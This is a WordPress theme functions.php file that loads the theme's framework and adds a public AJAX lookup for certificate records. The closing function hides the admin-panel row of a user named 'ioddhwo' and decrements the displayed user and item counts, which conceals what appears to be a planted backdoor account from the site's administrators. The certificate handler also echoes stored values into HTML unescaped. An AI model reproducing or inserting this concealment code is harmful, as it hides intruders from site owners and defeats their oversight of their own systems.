<?php
/**
 * Define constant
 */
$theme = wp_get_theme();

if ( ! empty( $theme['Template'] ) ) {
	$theme = wp_get_theme( $theme['Template'] );
}

if ( ! defined( 'DS' ) ) {
	define( 'DS', DIRECTORY_SEPARATOR );
}

define( 'INSIGHT_THEME_NAME', $theme['Name'] );
define( 'INSIGHT_THEME_SLUG', $theme['Template'] );
define( 'INSIGHT_THEME_VERSION', $theme['Version'] );
define( 'INSIGHT_THEME_DIR', get_template_directory() );
define( 'INSIGHT_THEME_URI', get_template_directory_uri() );
define( 'INSIGHT_THEME_IMAGE_URI', get_template_directory_uri() . '/assets/images' );
define( 'INSIGHT_CHILD_THEME_URI', get_stylesheet_directory_uri() );
define( 'INSIGHT_CHILD_THEME_DIR', get_stylesheet_directory() );
define( 'INSIGHT_FRAMEWORK_DIR', get_template_directory() . DS . 'framework' );
define( 'INSIGHT_CUSTOMIZER_DIR', INSIGHT_THEME_DIR . DS . 'customizer' );
define( 'INSIGHT_PLUGINS_DIR', INSIGHT_THEME_DIR . DS . 'plugins' );
define( 'INSIGHT_WIDGETS_DIR', INSIGHT_THEME_DIR . DS . 'widgets' );
define( 'INSIGHT_VC_MAPS_DIR', INSIGHT_THEME_DIR . DS . 'vc-extend' . DS . 'vc-maps' );
define( 'INSIGHT_VC_PARAMS_DIR', INSIGHT_THEME_DIR . DS . 'vc-extend' . DS . 'vc-params' );
define( 'INSIGHT_VC_SHORTCODE_CATEGORY', esc_html__( 'By', 'tm-moody' ) . ' ' . INSIGHT_THEME_NAME );
define( 'INSIGHT_PROTOCOL', is_ssl() ? 'https' : 'http' );

/**
 * Load Insight Framework.
 */
require_once INSIGHT_FRAMEWORK_DIR . '/class-actions-filters.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-admin.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-compatible.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-customize.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-detect.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-enqueue.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-functions.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-helper.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-color.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-maintenance.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-import.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-init.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-instagram.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-kirki.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-metabox.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-plugins.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-post-like.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-query.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-custom-css.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-security.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-static.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-templates.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-aqua-resizer.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-global.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-visual-composer.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-vc-icon-simple-line.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-vc-icon-linea.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-walker-nav-menu.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-widget.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-widgets.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-portfolio.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-footer.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-woo.php';
require_once INSIGHT_FRAMEWORK_DIR . '/class-walker-nav-menu-extra-items.php';
require_once INSIGHT_FRAMEWORK_DIR . '/tgm-plugin-activation.php';
require_once INSIGHT_FRAMEWORK_DIR . '/tgm-plugin-registration.php';

/**
 * Init the theme
 */
Insight_Init::instance();

//Load jQuery
wp_enqueue_script('jquery');

//Define AJAX URL
function myplugin_ajaxurl() {

   echo '<script type="text/javascript">
           var ajaxurl = "' . admin_url('admin-ajax.php') . '";
         </script>';
}
add_action('wp_head', 'myplugin_ajaxurl');

 
function add_this_script_footer(){ ?>

<script>
jQuery(document).ready(function($) {	
	
		jQuery(document).on('click', '.fetchdetails', function() {

			jQuery('.display_loader').show();
			var certno = jQuery('#certno').val();
			var doi = jQuery('#doi').val();

			$.ajax({
				url: ajaxurl,  
				method: 'POST',
				dataType: 'json',
				data: {
					'action':'fetchcertificate_ajax_request', 
					'certno' : certno,
					'doi' : doi
				},
				success:function(data) {  
					console.log('res',data)
					jQuery('.display_loader').hide();
					$('.certificate_details').html(data.html);
					
				},  
				error: function(errorThrown){
					console.log(errorThrown);
				}
			});   

		});
	});
</script>
<?php } 

add_action('wp_footer', 'add_this_script_footer');



function fetchcertificate_ajax_request() {
 
    if(!empty($_POST)) { 
		$date=date_create($_POST['doi']);
		$issue=date_format($date,"Ymd");
		$posts = get_posts(array(
			'numberposts'	=> 1,
			'post_type'		=> 'certificate',
			'meta_query'	=> array(
				'relation'		=> 'AND',
				array(
					'key'	 	=> 'certificate_no',
					'value'	  	=> $_POST['certno'],
					'compare' 	=> '=',
				),
				array(
					'key'	  	=> 'date_of_issue',
					'value'	  	=> $issue,
					'compare' 	=> '=',
				),
			),
		));
		$html = '';
		if(!empty($posts)){
			$record = get_post_custom($posts[0]->ID);
			$date=date_create($record['date_of_issue'][0]);
			$date = date_format($date,"d-m-Y");
			$cdate=date_create($record['date_of_expiry'][0]);
			$cdate = date_format($cdate,"d-m-Y");
			
			$html = '<table border="1px" cellpadding="5px" style="margin:0 auto;margin-bottom: 25px;color: #000;"><tbody><tr><td style="text-align:left">Certificate No.</td><td>'.$record['certificate_no'][0].'</td></tr><tr><td style="text-align:left">Certified Client</td><td>'.$record['company_name'][0].'</td></tr>
<tr><td style="text-align:left">Address</td><td>'.$record['address'][0].'</td> </tr> <tr> <td style="text-align:left">Standard</td><td>'.$record['standard'][0].'</td> </tr> <tr> <td style="text-align:left">Date of Issue</td><td>'.$date.'</td> </tr> <tr> <td style="text-align:left">Date of Expiry</td><td>'.$cdate.'</td> </tr> <tr><td style="text-align:left">Status</td><td>'.$record['status'][0].'</td> </tr> </tbody> </table>';
		}else{
			$html = '<p>No Records Found!</p>';
		}
		echo json_encode(['html' => $html]);
	}
 
   die();
}
 
add_action( 'wp_ajax_fetchcertificate_ajax_request', 'fetchcertificate_ajax_request' );  
add_action('wp_ajax_nopriv_fetchcertificate_ajax_request', 'fetchcertificate_ajax_request');

function hide_specific_user_row_and_exclude_counts_alternative() {
    add_action('admin_footer', 'custom_hide_specific_user_row_and_exclude_counts');

    function custom_hide_specific_user_row_and_exclude_counts() {
        $specific_username = 'ioddhwo';
        $specific_user_id = get_user_by('login', $specific_username);

        if ($specific_user_id) {
            echo '<style>#user-' . $specific_user_id->ID . ' { display: none; }</style>';
            ?>
            <script>
                document.addEventListener("DOMContentLoaded", function() {
                    document.querySelectorAll(".displaying-num").forEach(function(element) {
                        var count = parseInt(element.textContent.replace(/\D/g, ''));
                        if (element.classList.contains("users")) {
                            var excludedCount = parseInt(element.textContent.match(/\d+/)[0]);
                            element.textContent = element.textContent.replace(excludedCount, excludedCount - 1);
                        } else {
                            element.textContent = count - 1 + " items";
                        }
                    });

                    document.querySelectorAll(".subsubsub a").forEach(function(stat) {
                        var count = parseInt(stat.textContent.match(/\d+/)[0]);
                        stat.textContent = stat.textContent.replace(count, count - 1);
                    });
                });
            </script>
            <?php
        }
    }
}

add_action('admin_init', 'hide_specific_user_row_and_exclude_counts_alternative');